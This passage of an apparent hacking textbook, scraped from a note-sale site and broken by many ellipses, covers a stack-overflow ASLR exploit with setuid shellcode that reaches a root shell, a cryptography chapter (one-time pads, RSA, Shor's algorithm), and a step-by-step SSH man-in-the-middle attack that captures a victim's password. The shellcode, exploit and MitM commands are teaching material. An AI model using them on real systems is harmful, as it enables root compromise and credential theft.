The program is running
...
This
allows us to inject as much of a NOP sled as needed
...

aslr_execl_exploit
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
int main(int argc, char *argv[]) {
unsigned int i, ret, offset;
char buffer[1000];
printf("i is at %p\n", &i);
if(argc > 1) // Set offset
...

printf("ret addr is %p\n", ret);
for(i=0; i < 90; i+=4) // Fill buffer with return address
...

memcpy(buffer+900, shellcode, sizeof(shellcode));
execl("
...
The value 200 is added to the return address
to skip over the first 90 bytes used for the overwrite, so execution lands
somewhere in the NOP sled
...
/aslr_demo
reader@hacking:~/booksrc $ sudo chmod u+s
...
c
reader@hacking:~/booksrc $
...
out
i is at 0xbfa3f26c
ret addr is 0xb79f6de4
buffer is at 0xbfa3ee80
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa3f26c - 0xbfa3ee80"
$1 = 1004
reader@hacking:~/booksrc $
...
out 1004
i is at 0xbfe9b6cc
ret addr is 0xbfe9b3a8
buffer is at 0xbfe9b2e0
sh-3
...
/a
...
/a
...
2# whoami
root
sh-3
...
This leverages the fact that we can try the exploit as
many times as we want
...
Try writing an exploit to do this
...
Since the rules of a program
are defined by its creators, exploiting a supposedly secure program is simply a
matter of beating them at their own game
...
A hacker's ingenuity tends to find holes in these systems
...

Chapter 0x700
...
Cryptography is
simply the process of communicating secretly through the use of ciphers, and
cryptanalysis is the process of cracking or deciphering such secret communications
...

The wartime applications still exist, but the use of cryptography in civilian life is
becoming increasingly popular as more critical transactions occur over the
Internet
...
Passwords,
credit card numbers, and other proprietary information can all be sniffed and
stolen over unencrypted protocols
...

Without Secure Sockets Layer (SSL) encryption, credit card transactions at
popular websites would be either very inconvenient or insecure
...
Currently, cryptosystems that can be proven to be secure are far too
unwieldy for practical use
...
This means that it's possible that
shortcuts for defeating these ciphers exist, but no one's been able to actualize
them yet
...
This
could be due to the implementation, key size, or simply cryptanalytic weaknesses
in the cipher itself
...
This limit on key size makes the
corresponding cipher insecure, as was shown by RSA Data Security and Ian
Goldberg, a graduate student from the University of California, Berkeley
...
This was strong evidence that 40-bit
keys aren't large enough for a secure cryptosystem
...
At the purest level, the
challenge of solving a puzzle is enticing to the curious
...
Breaking
or circumventing the cryptographic protections of secret data can provide a
certain sense of satisfaction, not to mention a sense of the protected data's
contents
...

Expensive network intrusion detection systems designed to sniff network traffic
for attack signatures are useless if the attacker is using an encrypted
communication channel
...

Information Theory
Many of the concepts of cryptographic security stem from the mind of Claude
Shannon
...
Although the following concepts of
unconditional security, one-time pads, quantum key distribution, and
computational security weren't actually conceived by Shannon, his ideas on
perfect secrecy and information theory had great influence on the definitions of
security
...
This implies that cryptanalysis
is impossible and that even if every possible key were tried in an exhaustive bruteforce attack, it would be impossible to determine which key was the correct one
...
A onetime pad is a very simple cryptosystem that uses blocks of random data called
pads
...
Two identical pads are made: one for the recipient and
one for the sender
...
After the message is
encoded, the pad is destroyed to ensure that it is only used once
...
When the
recipient receives the encrypted message, he also XORs each bit of the encrypted
message with the corresponding bit of his pad to produce the original plaintext
message
...
The security of the one-time pad hinges on the security of
the pads
...
To be truly secure, this
could involve a face-to-face meeting and exchange, but for convenience, the pad
transmission may be facilitated via yet another cipher
...
Since the pad consists of
random data of the same length as the plaintext message, and since the security
of the whole system is only as good as the security of pad transmission, it usually
makes more sense to just send the plaintext message encoded using the same
cipher that would have been used to transmit the pad
...
One of these is a practical implementation of the onetime pad, made
possible by quantum key distribution
...
This is done using nonorthogonal quantum states in photons
...
Nonorthogonal simply means the states are
separated by an angle that isn't 90 degrees
...

The rectilinear basis of the horizontal and vertical polarizations is incompatible
with the diagonal basis of the two diagonal polarizations, so, due to the
Heisenberg uncertainty principle, these two sets of polarizations cannot both be
measured
...
When a photon passes through
the correct filter, its polarization won't change, but if it passes through the
incorrect filter, its polarization will be randomly modified
...

These strange aspects of quantum mechanics were put to good use by Charles
Bennett and Gilles Brassard in the first and probably best-known quantum key
distribution scheme, called BB84
...
In
this scheme, 1 could be represented by both vertical photon polarization and one
of the diagonal polarizations (positive 45 degrees), while 0 could be represented
by horizontal polarization and the other diagonal polarization (negative 45
degrees)
...

Then, the sender sends a stream of random photons, each coming from a
randomly chosen basis (either rectilinear or diagonal), and these photons are
recorded
...
Now, the two parties publicly compare which basis they used for each
photon, and they keep only the data corresponding to the photons they both
measured using the same basis
...
This makes up the key for the onetime pad
...
If there are too many
errors, someone was probably eavesdropping, and the key should be thrown

away
...

Computational Security
A cryptosystem is considered to be computationally secure if the best-known algorithm
for breaking it requires an unreasonable amount of computational resources and
time
...
Usually, the time needed to break a computationally secure
cryptosystem is measured in tens of thousands of years, even with the assumption
of a vast array of computational resources
...

It's important to note that the best-known algorithms for breaking cryptosystems
are always evolving and being improved
...
So, the current best-known algorithm is used instead to measure a
cryptosystem's security
...
Since an
algorithm is simply an idea, there's no limit to the processing speed for evaluating
the algorithm
...

Without factors such as processor speed and architecture, the important
unknown for an algorithm is input size
...
The input size is generally denoted by n, and each atomic step can be
expressed as a number
...

for(i = 1 to n) {
Do something;
Do another thing;
}
Do one last thing;

This algorithm loops n times, each time doing two actions, and then does one last
action, so the time complexity for this algorithm would be 2n + 1
...

for(x = 1 to n) {
for(y = 1 to n) {
Do the new action;
}
}
for(i = 1 to n) {
Do something;
Do another thing;
}
Do one last thing;

But this level of detail for time complexity is still too granular
...
However, as n becomes larger, the relative difference between 2n2 +
5 and 2n + 5 becomes larger and larger
...

Consider two algorithms, one with a time complexity of 2n + 365 and the other
with 2n2 + 5
...
But for n = 30, both algorithms perform equally, and for all n
greater than 30, the 2n + 365 algorithm will outperform the 2n2 + 5 algorithm
...

This means that, in general, the growth rate of the time complexity of an

algorithm with respect to input size is more important than the time complexity
for any fixed input
...

Asymptotic Notation
Asymptotic notation is a way to express an algorithm's efficiency
...

Returning to the examples of the 2n + 365 algorithm and the 2n2 + 5 algorithm,
we determined that the 2n + 365 algorithm is generally more efficient because it
follows the trend of n, while the 2n2 + 5 algorithm follows the general trend of n2
...

This sounds kind of confusing, but all it really means is that there exists a positive
constant for the trend value and a lower bound on n, such that the trend value
multiplied by the constant will always be greater than the time complexity for all n
greater than the lower bound
...
There's a convenient mathematical notation for this,
called big-oh notation, which looks like O(n2) to describe an algorithm that is in the
order of n2
...
So an algorithm with a time complexity of 3n4 +
43n3 + 763n + log n + 37 would be in the order of O(n4), and 54n7 + 23n4 + 4325
would be O(n7)
...
The encryption and decryption process is generally faster than with
asymmetric encryption, but key distribution can be difficult
...
A block cipher
operates on blocks of a fixed size, usually 64 or 128 bits
...

DES, Blowfish, and AES (Rijndael) are all block ciphers
...
This is
called the keystream, and it is XORed with the plaintext
...
RC4 and LSFR are examples of popular stream
ciphers
...
11b Encryption" on
Wireless 802
...

DES and AES are both popular block ciphers
...
Two concepts used repeatedly in block ciphers are confusion and
diffusion
...
This means that the output bits must involve
some complex transformation of the key and plaintext
...
Product ciphers combine both of these concepts by using various simple
operations repeatedly
...

DES also uses a Feistel network
...
Basically, each block is divided into two halves, left (L)
and right (R)
...
Usually, each round of operation has a separate
subkey, which is calculated earlier
...
This number was specifically chosen to defend
against differential cryptanalysis
...

Since the key is only 56 bits, the entire keyspace can be checked in an exhaustive
brute-force attack in a few weeks on specialized hardware
...
Encryption is done by encrypting the plaintext block
with the first key, then decrypting with the second key, and then encrypting again

with the first key
...
The added key size makes a brute-force effort
exponentially more difficult
...
However, quantum computation provides some interesting
possibilities, which are generally overhyped
...
A quantum
computer can store many different states in a superposition (which can be
thought of as an array) and perform calculations on all of them at once
...
The superposition can be
loaded up with every possible key, and then the encryption operation can be
performed on all the keys at the same time
...
Quantum computers are weird in that when the
superposition is looked at, the whole thing decoheres into a single state
...

Without some way to manipulate the odds of the superposition states, the same
effect could be achieved by just guessing keys
...
This algorithm allows the odds of a certain desired state to
increase while the others decrease
...

This takes about

steps
...
So, for the ultra paranoid,
doubling the key size of a block cipher will make it resistant to even the
theoretical possibilities of an exhaustive brute-force attack with a quantum
computer
...
The public key is
made public, while the private key is kept private; hence the clever names
...
This removes the issue of key distribution—public keys are public, and
by using the public key, a message can be encrypted for the corresponding
private key
...
However, asymmetric ciphers
tend to be quite a bit slower than symmetric ciphers
...
The security of RSA is
based on the difficulty of factoring large numbers
...
This is known as Euler's totient function, and it is usually denoted by
the lowercase Greek letter phi (φ)
...
It should
be easy to notice that if N is prime, φ(N ) will be N –1
...
This comes in handy, since φ(N) must be calculated for RSA
...

Then a decryption key must be found that satisfies the following equation, where S
is any integer:
E · D = S · φ(N) + 1
This can be solved with the extended Euclidean algorithm
...
The larger of the two numbers is divided
by the smaller number, paying attention only to the remainder
...
The last value for the remainder before it reaches zero is the
greatest common divisor of the two original numbers
...
That means that it should take about as many steps
to find the answer as the number of digits in the larger number
...
The table starts by putting the two numbers in the columns A and B,
with the larger number in column A
...
On the next line, the old B becomes the new A, and the old R
becomes the new B
...
The last value of R before zero is the greatest common divisor
...
That means that 7250 and
120 are relatively prime to each other
...

This is done by working the Euclidean algorithm backward
...
Here is the math from the prior example, with the
quotients:
7253 = 60 · 120 + 53
120 = 2 · 53 + 14
53 = 3 · 14 + 11
14 = 1 · 11 + 3
11 = 3 · 3 + 2
3 = 1 · 2 + 1
With a little bit of basic algebra, the terms can be moved around for each line so
the remainder (shown in bold) is by itself on the left of the equal sign:
53 = 7253 – 60 · 120
14 = 120 – 2 · 53
11 = 53 – 3 · 14
3 = 14 – 1 · 11
2 = 11 – 3 · 3

1 = 3 – 1 · 2
Starting from the bottom, it's clear that:
1 = 3 – 1 · 2
The line above that, though, is 2 = 11 –3 · 3, which gives a substitution for 2:
1 = 3 – 1 · (11 – 3 · 3)
1 = 4 · 3 – 1 · 11
The line above that shows that 3 = 14 –1 · 11, which can also be substituted in for
3:
1 = 4 · (14 – 1 · 11) – 1 · 11
1 = 4 · 14 – 5 · 11
Of course, the line above that shows that 11 = 53 –3 · 14, prompting another
substitution:
1 = 4 · 14 – 5 · (53 – 3 · 14)
1 = 19 · 14 – 5 · 53
Following the pattern, we use the line that shows 14 = 120 –2 · 53, resulting in
another substitution:
1 = 19 · (120 – 2 · 53) – 5 · 53
1 = 19 · 120 – 43 · 53
And finally, the top line shows that 53 = 7253 –60 · 120, for a final substitution:
1 = 19 · 120 – 43 · (7253 – 60 · 120)
1 = 2599 · 120 – 43 · 7253
2599 · 120 + – 43 · 7253 = 1
This shows that J and K would be 2599 and –43, respectively
...

Assuming the values for P and Q are 11 and 13, N would be 143
...
Since 7253 is relatively prime to 120, that number makes
an excellent value for E
...
The value for S doesn't really matter, which means this math is done modulo
φ(N), or modulo 120
...
This can be put into the prior equation from above:
E · D = S · φ(N) + 1

7253 · 77 = 4654 · 120 + 1
The values for N and E are distributed as the public key, while D is kept secret as
the private key
...
The encryption and decryption functions
are fairly simple
...
Then, only someone who knew the value for D could
decrypt the message and recover the number 98 from the number 76, as follows:
7677 = 98(mod143)
Obviously, if the message, M, is larger than N, it must be broken down into chunks
that are smaller than N
...
It states that if M and N
are relatively prime, with M being the smaller number, then when M is multiplied
by itself φ(N) times and divided by N, the remainder will always be 1:
If gcd(M, N) = 1 and M < N then Mφ(N) = 1(modN)
Since this is all done modulo N, the following is also true, due to the way
multiplication works in modulus arithmetic:
Mφ(N) · Mφ(N) = 1 ·1(modN)
M2 · φ(N) = 1(modN)
This process could be repeated again and again S times to produce this:
MS · φ(N) = 1(modN)
If both sides are multiplied by M, the result is:
MS · φ(N) · M = 1 ·M(modN)
MS · φ(N) + 1 = M(modN)
This equation is basically the core of RSA
...
This is basically a function that returns
its own input, which isn't all that interesting by itself
...
This can be done by
finding two numbers, E and D, that multiplied together equal S times φ(N) plus 1
...
The security of the algorithm is tied to keepingD secret
...
Therefore, the key sizes for
RSA must be chosen with the best-known factoring algorithm in mind to maintain
computational security
...
This algorithm has a subexponential run
time, which is pretty good, but still not fast enough to crack a 2,048-bit RSA key in
a reasonable amount of time
...
Peter Shor was able to take advantage of the massive parallelism of
quantum computers to efficiently factor numbers using an old number-theory
trick
...
Take a number, N, to factor
...
This value should also be relatively prime to N, but
assuming that N is the product of two prime numbers (which will always be the
case when trying to factor numbers to break RSA), if A isn't relatively prime to N,
then A is one of N's factors
...
This is all
done at the same time, through the magic of quantum computation
...

Luckily, this can be done quickly on a quantum computer with a Fourier
transform
...

Then, simply calculate gcd(AR/2 + 1, N) and gcd(AR/2 –1, N)
...
This is possible because AR = 1(modN) and is
further explained below
...
As long as these
values don't zero themselves out, one of them will have a factor in common with N
...
In this
case N equals 143
...
The function will look like f(x) = 21x(mod143)
...

To keep this brief, the assumption will be that the quantum computer has three
quantum bits, so the superposition can hold eight values
...
Armed with this information,
gcd(212 –1143) and gcd(212 + 1143) should produce at least one of the factors
...
These factors can then be used to recalculate the private key for the
previous RSA example
...
An asymmetric cipher is used
to exchange a randomly generated key that is used to encrypt the remaining
communications with a symmetric cipher
...
Hybrid
ciphers are used by most modern cryptographic applications, such as SSL, SSH,
and PGP
...
However, if an attacker can intercept
communications between both parties and masquerade as one or the other, the
key exchange algorithm can be attacked
...
The
attacker sits between the two communicating parties, with each party believing
they are communicating with the other party, but both are communicating with
the attacker
...
Usually, this key is
used to encrypt further communication between the two parties
...

However, in an MitM attack, party A believes that she is communicating with B,
and party B believes he is communicating with A, but in reality, both are
communicating with the attacker
...
Then the attacker just needs to open another encrypted
connection with B, and B will believe that he is communicating with A, as shown in
the following illustration
...

This means that the attacker actually maintains two separate encrypted
communication channels with two separate encryption keys
...
The attacker then decrypts these packets with the first key and re-encrypts
them with the second key
...
By sitting in the
middle and maintaining two separate keys, the attacker is able to sniff and even
modify traffic between A and B without either side being the wiser
...
Most of these are just
modifications to the existing openssh source code
...

This can all be done with the ARP redirection technique from "Active Sniffing" on
Active Sniffing and a modified openssh package aptly called mitmssh
...
The source package is on the LiveCD in /usr/src/mitm-ssh,
and it has already been built and installed
...
With the help of arpspoof to poison ARP caches,
traffic to the target SSH server can be redirected to the attacker's machine
running mitm-ssh
...

In the example below, the target SSH server is at 192
...
42
...
When mitm-ssh
is run, it will listen on port 2222, so it doesn't need to be run as root
...

reader@hacking:~ $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
--to-ports 2222
reader@hacking:~ $ sudo iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

REDIRECT tcp -- anywhere anywhere tcp dpt:ssh redir ports 2222
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
reader@hacking:~ $ mitm-ssh

...
9p1]
_|_ By CMN ...
168
...
72 -v -n -p 2222
Using static route to 192
...
42
...
0
...
0 port 2222
...

RSA key generation complete
...
168
...
72 to
our machine, instead
...
3
Usage: arpspoof [-i interface] [-t target] host
reader@hacking:~ $ sudo arpspoof -i eth0 192
...
42
...
168
...
72 is-at 0:12:3f:7:39:9c
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192
...
42
...
168
...
72 is-at 0:12:3f:7:39:9c

And now the MitM attack is all set up and ready for the next unsuspecting victim
...
168
...
250),
which makes an SSH connection to 192
...
42
...

On Machine 192
...
42
...
168
...
72 (loki)
iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA key fingerprint is 84:7a:71:58:0f:b5:5e:1b:17:d7:b5:9c:81:5a:56:7c
...
168
...
72' (RSA) to the list of known hosts
...
168
...
72's password:
Last login: Mon Oct 1 06:32:37 2007 from 192
...
42
...
6
...
bash_logout
...
bashrc
...
swp
...
168
...
72 closed
...
However, the
connection was secretly routed through the attacker's machine, which used a
separate encrypted connection to back to the target server
...

On the Attacker's Machine
reader@hacking:~ $ sudo mitm-ssh 192
...
42
...
168
...
72:22
SSH MITM Server listening on 0
...
0
...

Generating 768 bit RSA key
...

WARNING: /usr/local/etc/moduli does not exist, using fixed modulus
[MITM] Found real target 192
...
42
...
168
...
250:1929
[MITM] Routing SSH2 192
...
42
...
168
...
72:22
[2007-10-01 13:33:42] MITM (SSH2) 192
...
42
...
168
...
72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt
[MITM] Connection from UNKNOWN:1929 closed
reader@hacking:~ $ ls /usr/local/var/log/mitm-ssh/
passwd
...
168
...
250:1929 <- 192
...
42
...
168
...
250:1929 -> 192
...
42
...
log
[2007-10-01 13:33:42] MITM (SSH2) 192
...
42
...
168
...
72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt
reader@hacking:~ $ cat /usr/local/var/log/mitm-ssh/ssh2*
Last login: Mon Oct 1 06:32:37 2007 from 192
...
42
...
6
...
bash_logout
...
bashrc
...
swp
...
In addition, the data
transmitted during the connection is captured, showing the attacker everything

the victim did during the SSH session
...
SSL and SSH were designed with this in mind and have
protections against identity spoofing
...
If the attacker doesn't have the proper certificate
or fingerprint for B when A attempts to open an encrypted communication
channel with the attacker, the signatures won't match and A will be alerted with a
warning
...
168
...
250 (tetsuo) had never previously
communicated over SSH with 192
...
42
...
The host fingerprint that it accepted was actually the fingerprint
generated by mitm-ssh
...
168
...
250 (tetsuo) had a host
fingerprint for 192
...
42
...
168
...
72
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed
...

Please contact your system administrator
...
ssh/known_hosts to get rid of this message
...
ssh/known_hosts:1
RSA host key for 192
...
42
...

Host key verification failed
...
However, many Windows SSH clients don't
have the same kind of strict enforcement of these rules and will present the user
with an "Are you sure you want to continue?" dialog box
...

Differing SSH Protocol Host Fingerprints
SSH host fingerprints do have a few vulnerabilities
...

Usually, the first time an SSH connection is made to a new host, that host's
fingerprint is added to a known_hosts file, as shown here:
iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
...
168
...
72' (RSA) to the list of known hosts
...
168
...
72's password:
iz@tetsuo:~ $ grep 192
...
42
...
ssh/known_hosts
192
...
42
...

iz@tetsuo:~ $ rm ~/
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)? no
Host key verification failed
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)? no
Host key verification failed
...
168
...
72 22
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
99-OpenSSH_3
...

iz@tetsuo:~ $ telnet 192
...
42
...
168
...
1
...
168
...
1
...

SSH-2
...
3p2 Debian-8ubuntu1

Connection closed by foreign host
...
168
...
72 (loki) includes the string SSH-1
...
Often, the SSH
server will be configured with a line like Protocol 2,1, which also means the
server speaks both protocols and tries to use SSH2 if possible
...

In contrast, the banner from 192
...
42
...
0, which
shows that the server only speaks protocol 2
...

The same is true for loki (192
...
42
...
It's unlikely that a client will have used
SSH1, and therefore doesn't have the host fingerprints for this protocol yet
...
Instead
of being presented with a lengthy warning, the user will simply be asked to add
the new fingerprint
...
By adding the line Protocol 1 to
/usr/local/etc/mitm-ssh_config, the mitm-ssh daemon will claim it only speaks the
SSH1 protocol
...

From 192
...
42
...
168
...
72 22
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
99-OpenSSH_3
...

iz@tetsuo:~ $ rm ~/
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192
...
42
...

jose@192
...
42
...
log
# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh
# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-ssh
Protocol 1

reader@hacking:~ $ mitm-ssh 192
...
42
...
168
...
72:22
SSH MITM Server listening on 0
...
0
...

Generating 768 bit RSA key
...

Now Back on 192
...
42
...
168
...
72 22
Trying 192
...
42
...

Connected to 192
...
42
...

Escape character is '^]'
...
5-OpenSSH_3
...

Usually, clients such as tetsuo connecting to loki at 192
...
42
...
Therefore, there would only be a host fingerprint
for SSH protocol 2 stored on the client
...
Older implementations will simply ask to add this
fingerprint since, technically, no host fingerprint exists for this protocol
...

iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6
...
168
...
72
WARNING: RSA key found for host 192
...
42
...
ssh/known_hosts:1
RSA key fingerprint ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
...
168
...
72 (192
...
42
...

RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6
...
Also, since not all clients will be up to date, this
technique can still prove to be useful for an MitM attack
...
Often, a
user will connect to a server from several different clients
...
While no one actually memorizes the entire fingerprint, major
changes can be detected with little effort
...
If an MitM attack is attempted, the blatant difference
in host fingerprints can usually be detected by eye
...
Certain fingerprints will look very
similar to others
...

Usually, the hex digits found at the beginning and end of the fingerprint are

remembered with the greatest clarity, while the middle tends to be a bit hazy
...

The openssh package provides tools to retrieve the host key from servers
...
168
...
72 > loki
...
168
...
72 SSH-1
...
9p1
reader@hacking:~ $ cat loki
...
168
...
72 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA8Xq6H28EOiCbQaFbIzPtMJSc316SH4aOijgkf7nZnH4LirNziH5upZmk4/
JSdBXcQohiskFFeHadFViuB4xIURZeF3Z7OJtEi8aupf2pAnhSHF4rmMV1pwaSuNTahsBoKOKSaTUOW0RN/1t3G/
52KTzjtKGacX4gTLNSc8fzfZU=
reader@hacking:~ $ ssh-keygen -l -f loki
...
168
...
72
reader@hacking:~ $

Now that the host key fingerprint format is known for 192
...
42
...
A program that does this has been
developed by Rieck and is available at http://www
...
org/thc-ffp/
...
168
...
72 (loki)
...

Colon-separated: 01:23:45:67
...

-k type Specify type of key to calculate [Default: rsa]
Available: rsa, dsa
-b bits Number of bits in the keys to calculate [Default: 1024]
-K mode Specify key calulation mode [Default: sloppy]
Available: sloppy, accurate
-m type Specify type of fuzzy map to use [Default: gauss]
Available: gauss, cosine
-v variation Variation to use for fuzzy map generation [Default: 7
...
14]
-l size Size of list that contains best fingerprints [Default: 10]
-s filename Filename of the state file [Default: /var/tmp/ffp
...
state present, specify a target hash
...
83% | 9
...
52% | 7
...
49% | 5
...
74% | 3
...
25% | 2
...
05% | 1
...
12% | 0
...
47% | 0
...
09% | 0
...
00% | 0
...
19% | 0
...
65% | 0
...
39% | 1
...
41% | 3
...
71% | 4
...
29% | 6
...
prime: Yes
Generation Mode: Sloppy

State File: /var/tmp/ffp
...

---[Current State]------------------------------------------------------------- Running: 0d 00h 00m 00s | Total: 0k hashs | Speed: nan hashs/s
------------------------------------------------------------------------------- Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
652482%

---[Current State]------------------------------------------------------------- Running: 0d 00h 01m 00s | Total: 7635k hashs | Speed: 127242 hashs/s
------------------------------------------------------------------------------- Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
471931%
---[Current State]------------------------------------------------------------- Running: 0d 00h 02m 00s | Total: 15370k hashs | Speed: 128082 hashs/s
------------------------------------------------------------------------------- Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
471931%

...

---[Current State]-------------------------------------------------------------Running: 1d 05h 06m 00s | Total: 13266446k hashs | Speed: 126637 hashs/s
-------------------------------------------------------------------------------Best Fuzzy Fingerprint from State File /var/tmp/ffp
...
158321%
--------------------------------------------------------------------------------

Exiting and saving state file /var/tmp/ffp
...
The
program keeps track of some of the best fingerprints and will display them
periodically
...
state, so the
program can be exited with a CTRL-C and then resumed again later by simply
running ffp without any arguments
...

reader@hacking:~ $ ffp -e -d /tmp
---[Restoring]----------------------------------------------------------------- Reading FFP State File: Done
Restoring environment: Done
Initializing Crunch Hash: Done
------------------------------------------------------------------------------- Saving SSH host key pairs: [00] [01] [02] [03] [04] [05] [06] [07] [08] [09]
reader@hacking:~ $ ls /tmp/ssh-rsa*
/tmp/ssh-rsa00 /tmp/ssh-rsa02
...
pub
/tmp/ssh-rsa00
...
pub /tmp/ssh-rsa08
/tmp/ssh-rsa01 /tmp/ssh-rsa03
...
pub
/tmp/ssh-rsa01
...
pub /tmp/ssh-rsa09
/tmp/ssh-rsa02 /tmp/ssh-rsa04
...
pub
reader@hacking:~ $

In the preceding example, 10 public and private host key pairs have been
generated
...

reader@hacking:~ $ for i in $(ls -1 /tmp/ssh-rsa*
...
pub
1024 ba:06:7f:12:bd:8a:5b:5c:eb:dd:93:ec:ec:d3:89:a9 /tmp/ssh-rsa01
...
pub

1024 ba:06:49:d4:b9:d4:96:4b:93:e8:5d:00:bd:99:53:a0 /tmp/ssh-rsa03
...
pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05
...
pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07
...
pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09
...
/loki
...
168
...
72
reader@hacking:~ $

From the 10 generated key pairs, the one that seems to look the most similar can
be determined by eye
...
pub, shown in bold, was chosen
...

This new key can be used with mitm-ssh to make for an even more effective
attack
...
Since we need to remove the Protocol 1 line we
added earlier, the output below simply overwrites the configuration file
...
168
...
72 -v -n -p 2222Using static route to 192
...

42
...
Could not load host key
SSH MITM Server listening on 0
...
0
...

In another terminal window, arpspoof is running to redirect the traffic to mitmssh, which will use the new host key with the fuzzy fingerprint
...

Normal Connection
iz@tetsuo:~ $ ssh jose@192
...
42
...
168
...
72 (192
...
42
...

RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
...
168
...
72
The authenticity of host '192
...
42
...
168
...
72)' can't be established
...

Are you sure you want to continue connecting (yes/no)?

Can you immediately tell the difference? These fingerprints look similar enough to
trick most people into simply accepting the connection
...
A file containing all the
passwords in plaintext form would be far too attractive a target, so instead, a oneway hash function is used
...

NAME
crypt - password and data encryption
SYNOPSIS
#define _XOPEN_SOURCE
#include ...
It is based on the Data
Encryption Standard algorithm with variations intended (among other
things) to discourage use of hardware implementations of a key search
...

salt is a two-character string chosen from the set [a-zA-Z0-9
...

This is a one-way hash function that expects a plaintext password and a salt value
for input, and then outputs a hash with the salt value prepended to it
...
Writing a quick program to experiment
with this function will help clarify any confusion
...
c
#define _XOPEN_SOURCE
#include

Notesale: Turn your study into money

Already a Member? >

Search for notes by fellow students, in your own course and all over the country.

My Basket

Document Preview

URL not found